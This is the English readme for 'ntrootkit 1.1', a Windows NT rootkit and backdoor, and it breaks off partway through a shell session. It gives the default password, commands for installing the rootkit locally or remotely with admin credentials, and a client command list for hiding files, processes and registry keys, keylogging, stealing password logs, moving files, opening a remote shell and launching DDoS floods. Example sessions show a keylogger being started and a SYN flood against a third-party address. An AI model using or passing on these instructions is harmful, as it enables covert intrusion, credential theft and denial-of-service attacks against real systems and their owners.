en_readme.txt

国外rootkit成员写的NT_rootkit源代码.

				yyt_hac's ntrootkit 1.1 Readme


The first thing you should know about this rootkit is that the built-in 
backdoor can communicate
with the client in 4 ways (0:Userdefined,1:Icmp,2:Udp,3:Tcp). these are all 
connectionless so
using a utility like fport.exe will not show a connection since there isnt 
one. TCP and UDP are
the most reliable.

Also of importance is that the defautl password is yyt_hac . This can and 
should be changed but
for connecting to the backdoor for the first time it must be used.

-Local Installation and Commandline Options

	C:\WINNT\system32>ntrootkit -h
	This is yyt_hac's ntrootkit server 1.1
	Welcome to http://www.yythac.com

	Usage:ntrootkit \\ip -u username -p password
	ip             the computer you want to install ntrootkit on
	-u [username]  admin account on remote computer
	-p [password]  admin password on remote computer

	Usage:ntrootkit [-v/-m/-u [password]/-i [password]]
	-v             show the ntrootkit version that is installed
	-u [password]  uninstall the ntrootkit
	-i [password]  update the ntrootkit, the new version will be run after 
reboot
	-m             show the work mode of the ntrootkit
	-m [workmode]  set the workmore of the rootkit (0=sniffer, 1=driver)


	C:\WINNT>ntrootkit			//local install, run without any options
	This is yyt_hac's ntrootkit server 1.1
	Welcome to http://www.yythac.com


	Exacting files.....ok
	Installing service..ok
	Starting up The Ntrootkit..ok

	The Ntrootkit is installed and  started successfully!
	C:\WINNT>ntrootkit  -m
	This is yyt_hac's ntrootkit server 1.1
	Welcome to http://www.yythac.com

	The ntrootkit is using windows 2000 sniffer mode to recv packet

	//This mode is not very stable, driver is highly reccommended

	C:\WINNT\>ntrootkit -v
	ntrootkit -v
	This is yyt_hac's ntrootkit server 1.1
	Welcome to http://www.yythac.com

	The Version of Ntrootkit that is installed  is 1.1


	C:\WINNT\system32>ntrootkit -i [password]		//update rootkit
	ntrootkit -i
	yyt_hac
	This is yyt_hac's ntrootkit server 1.1
	Welcome to http://www.yythac.com

	Please enter you password:
	Please wait a minute.....
	Update successfully,the new version very runs after system reboots!

-Remote Installation


	F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456
	This is yyt_hac's ntrootkit server 1.1
	Welcome to http://www.yythac.com


	Connecting to remote computer...ok
	Exacting files.....ok
	Installing service..ok
	Starting up The Ntrootkit..ok
	Disconnecting...ok

	The Ntrootkit is installed and  started successfully!

-Backdoor

	L:\c\rootkit\44\RTCLIENT\Release>rtclient
	It is yyt_hac's ntrootkit client 1.1
	Welcome to http://www.yythac.com
	usage:rtclient destip [-p password] [-t proto] [-o port]  [-y icmp_type] 
[-d icmp_code] [-m MTU] [-c Command]

	destip-------------The computer you want to connect
	password-----------The ntrootkit's password
	proto--------------The proto that ntrootkit will 
use(0:userdefined,1:icmp,2:udp,3:tcp)
	port---------------The dest udp or tcp port which send packet to (default 
is 445)
	MTU----------------The MAX packet size the ntrootkit will use to send 
packet(if not provided ,the program will get it automatically  )
	icmp_type----------The icmp packet type which send to server,default is 
ICMP_ECHO REPLY
	icmp_code----------The icmp packet code which send to server,default is 0
	Command------------The command which you want the server to do
	The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type 
DDos_seconds DDos_ProcCount]
	DDos_Destip--------The computer you want to DDos
	DDos_Destport------The Destport you want to DDos (default is 445)
	DDos_type----------The DDos type you want to use (0:ping flood,1:udp 
flood,2:synflood,3:mstream flood,default is 0)
	DDos_seconds-------The seconds you want to DDos the dest (default is 150s)
	DDos_ProcCount-----The process count which the server use to ddos (default 
is 10)

	//the only required commandline options are destip and password, others 
have default values


	L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3
	It is yyt_hac's ntrootkit client 1.0
	Welcome to http://www.yythac.com

	Getting ip address of the computer...
	1.         1.1.1.89
	2.         1.1.1.200
	Please Select the number of the ip address you want to use to send and recv 
packet:1
	Time out,Please make sure the target is up and try again

	//if the default port of 445 does not work, try another with the -o option

	L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139
	It is yyt_hac's ntrootkit client 1.1
	Welcome to http://www.yythac.com

	Getting ip address of the computer...
	1.         1.1.1.89
	2.         1.1.1.200
	Please Select the number of the ip address you want to use to send and recv 
packet:1
	Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command 
list
	CMD>?

	********yyt_hac's ntrootkit Server Command List********
	?-------------------------------Show this list
	HideFileDir [FileName or DIR]----------------------Hide the file or 
directory
	HideProcId [pid]----------------Hide process with the id
	HideProcName [procname]---------Hide process with the process name
	HideKey [KeyName]---------------Hide a registry key
	HideValue [ValueName]-----------Hide a registry value
	HideUser [UserName]-------------Hide a User
	HideServ [ServiceName]----------Hide a Service
	ShowFileDir FileName or DIR-----UnHide the file or directory that been 
hidden before
	ShowProcId pid------------------UnHide the process that been hidden before 
with the id
	ShowProcName procname-----------UnHide the process that been hidden before 
with the process name
	ShowKey KeyName-----------------UnHide the registry key
	ShowValue ValueName-------------UnHide the registry value
	ShowUser UserName---------------UnHide the user that been hidden before
	ShowServ ServiceName------------UnHide the service that been hidden before
	Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer
	Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer
	KeyLogOn------------------------------Start key log
	KeyLogOff-----------------------------Stop key log
	DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds 
DDos_ProcCount]---DDos the destip
	SDDOS---------------------------------Stop DDos
	GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password 
file to local computer
	DelPwd--------------------------------Del the ntrootkit keylog password 
file
	Ps------------------------------------Show all processes on remote machine
	Kill pid------------------------------Kill the process with the id or name
	RTVer---------------------------------Show Ntrootkit server version and 
author info
	SetPass [NewPassword]-----------------Change or show the connection 
password
	Reboot--------------------------------Reboot the targer computer
	OpenShell-----------------------------Open a command shell
	Exit----------------------------------Exit the shell or rootkit

	//notes

	HideKey,HideServ,etc                  Call any Hide* command without a 
parameter to see a list
					      of currently hidden items
	HideUser [UserName]-------------------Not implemented yet
	HideServ [ServiceName]----------------Hide a service by service name NOT 
display name


CMD>ps					//list processes, including hidden
ProcessID         ProcessName
0                   [System Process]
8                   System
176                 smss.exe
200                 csrss.exe
224                 WINLOGON.EXE
252                 services.exe
264                 LSASS.EXE
452                 svchost.exe
508                 spoolsv.exe
536                 NETDDE.EXE
1364                ntfrs.exe
1392                NTservice.exe
1404                NTweb.exe
1412                CCP.exe
1900                termsrv.exe
1952                winmgmt.exe
1968                winvnc.exe
1992                dns.exe
2032                inetinfo.exe
2076                ismserv.exe
2512                explorer.exe
2720                internat.exe
2728                sqlmangr.exe
2652                plog.exe
2624                SysArchive.exe
2752                svchost.exe
3160                DWRCS.EXE
11544               SpntSvc.exe
23028               CCProxy.exe
27096               mshta.exe
27980               PSEXESVC.EXE
28008               cmd.exe
27872               rtkit.exe

CMD>kill 27096
process is been killed !
CMD>rtver
The ntrootkit version is 1.1,
welcome to http://www.yythac.com
CMD>hideprocid					//list hidden processes
The Hide ProcId:
CMD>keylogon					//start keylogger
Key log Start successfully
CMD>ddos 202.202.23.3.14 139 2 30                //DOS 202.23.3.14 with a 
syn flood on port 139 for 30sec
DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos 
process count:10,
DDos started successfully!
CMD>ddos 202.23.3.14 139 2 30                   //can only do one dos at at 
a time
DDos already started
CMD>sddos				        //stop running dos attack
Stop DDos sucessfully!
CMD>openshell					//windows commandshell
Microsoft Windows 2000 [